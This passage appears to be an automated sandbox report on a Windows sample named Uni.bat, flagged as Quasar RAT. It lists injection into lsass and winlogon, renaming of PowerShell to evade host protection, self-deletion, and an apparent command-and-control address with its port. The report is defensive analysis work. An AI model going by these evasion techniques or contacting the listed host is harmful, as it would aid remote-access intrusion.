Source: winlogon.exe, 0000000D.00000000.3210196959.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3193659897.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000000.3522971776.00000252B0EA1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: winlogon.exe, 0000000D.00000000.3210196959.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000D.00000000.3193659897.0000023565F61000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000000.3522971776.00000252B0EA1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\CloudStore VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 5_2_00000001400F5A60
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 5_2_000000014010E0F0
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 5_2_000000014010E1F0
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 5_2_000000014010E340
Source: C:\Windows\System32\dllhost.exe Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW, 5_2_000000014010ECA0
Source: C:\Windows\System32\dllhost.exe Code function: GetLocaleInfoW, 5_2_0000000140068BA8
Source: C:\Windows\System32\dllhost.exe Code function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_0000000140069E18
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 11_2_00000001400F5A60
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 11_2_000000014010E0F0
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 11_2_000000014010E1F0
Source: C:\Windows\System32\dllhost.exe Code function: EnumSystemLocalesW, 11_2_000000014010E340
Source: C:\Windows\System32\dllhost.exe Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW, 11_2_000000014010ECA0
Source: C:\Windows\System32\dllhost.exe Code function: GetLocaleInfoW, 11_2_0000000140068BA8
Source: C:\Windows\System32\dllhost.exe Code function: IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_0000000140069E18
Source: C:\Users\user\Desktop\Uni.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_0000000140068702 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,ReadFile,WriteFile,Sleep,DisconnectNamedPipe,Sleep, 5_2_0000000140068702
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400761E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_00000001400761E0
AV process strings found (often used to terminate AV products)
Source: Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.22.dr Binary or memory string: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MsMpEng.exe
Source: Uni.bat.exe, 00000003.00000002.2445093143.0000019D00770000.00000004.00000800.00020000.00000000.sdmp, Uni.bat.exe, 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Quasar RAT
Source: Yara match File source: 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Uni.bat.exe PID: 5268, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Quasar RAT
Source: Yara match File source: 00000003.00000002.2429957465.0000019D0022C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Uni.bat.exe PID: 5268, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 764821 Sample: Uni.bat Startdate: 11/12/2022 Architecture: WINDOWS Score: 100 71 Multi AV Scanner detection for domain / URL 2->71 73 Antivirus detection for URL or domain 2->73 75 Multi AV Scanner detection for dropped file 2->75 77 6 other signatures 2->77 10 cmd.exe 2 2->10         started        process3 file4 49 C:\Users\user\Desktop\Uni.bat.exe, PE32+ 10->49 dropped 87 Obfuscated command line found 10->87 89 Renames powershell.exe to bypass HIPS 10->89 14 Uni.bat.exe 18 10->14         started        18 conhost.exe 10->18         started        signatures5 process6 file7 59 C:\Windows\$sxr-seroxen.bat, DOS 14->59 dropped 99 Deletes itself after installation 14->99 101 Writes to foreign memory regions 14->101 103 Modifies the context of a thread in another process (thread injection) 14->103 105 Injects a PE file into a foreign processes 14->105 20 cmd.exe 2 14->20         started        24 dllhost.exe 14->24         started        signatures8 process9 file10 47 C:\Windows\$sxr-seroxen.bat.exe, PE32+ 20->47 dropped 79 Obfuscated command line found 20->79 81 Drops executables to the windows directory (C:\Windows) and starts them 20->81 83 Renames powershell.exe to bypass HIPS 20->83 26 $sxr-seroxen.bat.exe 21 20->26         started        31 conhost.exe 20->31         started        signatures11 process12 dnsIp13 61 185.246.220.123, 4782, 49843, 49844 LVLT-10753US Germany 26->61 51 C:\Windows\System32\vcruntime140d.dll, PE32+ 26->51 dropped 53 C:\Windows\System32\vcruntime140_1d.dll, PE32+ 26->53 dropped 55 C:\Windows\System32\ucrtbased.dll, PE32+ 26->55 dropped 57 C:\Windows\$sxr-seroxen\$sxr-nircmd.exe, PE32 26->57 dropped 91 Writes to foreign memory regions 26->91 93 Modifies the context of a thread in another process (thread injection) 26->93 95 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->95 97 2 other signatures 26->97 33 dllhost.exe 1 26->33         started        36 dllhost.exe 26->36         started        file14 signatures15 process16 signatures17 63 Injects code into the Windows Explorer (explorer.exe) 33->63 65 Writes to foreign memory regions 33->65 67 Creates a thread in another existing process (thread injection) 33->67 69 Injects a PE file into a foreign processes 33->69 38 lsass.exe 33->38 injected 41 winlogon.exe 33->41 injected 43 svchost.exe 33->43 injected 45 28 other processes 33->45 process18 signatures19 85 Writes to foreign memory regions 38->85
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.246.220.123
 unknown Germany
10753 LVLT-10753US false